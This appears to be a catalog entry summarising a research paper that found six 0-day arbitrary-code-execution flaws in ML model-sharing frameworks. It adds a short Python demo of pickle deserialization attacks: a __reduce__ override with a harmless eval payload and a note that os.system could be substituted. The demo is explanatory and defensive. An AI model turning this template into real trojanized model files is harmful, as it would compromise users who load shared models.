benchmark 2025

When Secure Isn't: Assessing the Security of Machine Learning Model Sharing

Gabriele Digregorio, Marco Di Gennaro, Stefano Zanero, Stefano Longari, Michele Carminati


Published on arXiv (arXiv:2509.06703)

AI Supply Chain Attacks

OWASP ML Top 10 — ML06

Key Finding

Six 0-day arbitrary code execution vulnerabilities were found in ML frameworks claiming secure model-sharing support, demonstrating that neither security-oriented settings nor file format alone can guarantee safety in the ML supply chain.


The rise of model sharing through frameworks and dedicated hubs has made Machine Learning significantly more accessible. Despite their benefits, these tools expose users to underexplored security risks, and security awareness remains limited among both practitioners and developers. To foster a more security-conscious culture around Machine Learning model sharing, this paper evaluates the security posture of frameworks and hubs, assesses whether security-oriented mechanisms offer real protection, and surveys how users perceive the security narratives surrounding model sharing. The evaluation shows that most frameworks and hubs address security risks partially at best, often by shifting responsibility to the user. More concerningly, an analysis of frameworks advertising security-oriented settings and complete model sharing uncovered six 0-day vulnerabilities enabling arbitrary code execution. Through this analysis, the paper debunks the misconceptions that the model-sharing problem is largely solved and that its security can be guaranteed by the file format used for sharing. As expected, the survey shows that the surrounding security narrative leads users to treat security-oriented settings as trustworthy, despite the weaknesses demonstrated in this work. From these findings, the authors derive takeaways and suggestions to strengthen the security of model-sharing ecosystems.


Key Contributions

  • Systematic security evaluation of major ML model-sharing frameworks and hubs, showing most address risks only partially and shift responsibility to users
  • Discovery of six 0-day vulnerabilities enabling arbitrary code execution in frameworks advertising security-oriented or 'safe' model-sharing settings
  • User survey revealing that security narratives around model sharing cause practitioners to over-trust security-oriented settings despite demonstrated weaknesses

🛡️ Threat Analysis

AI Supply Chain Attacks

The paper's primary focus is the security of ML model-sharing infrastructure — frameworks (e.g., those handling serialization/deserialization), model hubs, and security-oriented sharing settings. Discovering 0-day vulnerabilities enabling arbitrary code execution when users load shared models is a canonical AI supply chain attack: malicious or vulnerable models distributed via public repositories and frameworks can compromise user systems at load time.
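The paper does not publish its exploit code, but the class of load-time arbitrary code execution it describes is well illustrated by Python's `pickle` protocol, which several ML serialization formats build on. The sketch below is a minimal, self-contained illustration (not the paper's actual vulnerabilities): a "model" object overrides `__reduce__` so that merely deserializing the file runs an attacker-chosen callable. Here the payload harmlessly calls `eval("2+2")`; a real attacker would substitute something like `os.system`.

```python
import pickle

class MaliciousModel:
    """Stand-in for a trojanized model artifact (illustrative only)."""
    def __reduce__(self):
        # pickle records this (callable, args) pair in the byte stream;
        # the *loader* invokes it during deserialization.
        return (eval, ("2+2",))

# Attacker side: serialize the booby-trapped object, e.g. into a model file.
payload = pickle.dumps(MaliciousModel())

# Victim side: simply loading the "model" executes the embedded expression.
# No method on the object is ever called explicitly.
result = pickle.loads(payload)
print(result)  # 4 — proof the loader executed attacker-controlled code
```

This is why load-time deserialization, not inference, is the attack surface: the code runs before the user ever calls the model, and scanning the file extension or trusting a "secure" loading flag does not by itself remove this class of risk.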


Details

Threat Tags
black_box, digital, inference_time
Applications
ML model sharing, model hubs, ML frameworks, model deserialization